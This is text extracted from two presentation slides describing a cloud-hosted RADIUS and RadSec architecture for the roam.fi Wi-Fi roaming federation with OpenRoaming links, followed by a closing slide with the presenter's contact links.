  • 33. Radiator Auth.Fi Enterprise Wi-Fi as a service Redundant roam.fi RADIUS service in public cloud Adding RadSec to roam.fi roaming federation Tampere University RADIUS Other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc. RADIUS RADIUS RADIUS RADIUS Two more instances added for inbound RadSec for roam.fi organisations outbound OpenRoaming outbound OpenRoaming inbound OpenRoaming inbound OpenRoaming inbound RadSec for roam.fi organisations inbound RadSec for roam.fi organisations
  • 34. Thank you, any questions? Slideshare (personal): slideshare.net/khuhtanen/ Radiator Software webinars: radiatorsoftware.com/webinars/ Mastodon (personal): @khuhtanen@infosec.exchange Twitter (personal): @khuhtanen Twitter (company): @RadiatorAAA Radiator Software: radiatorsoftware.com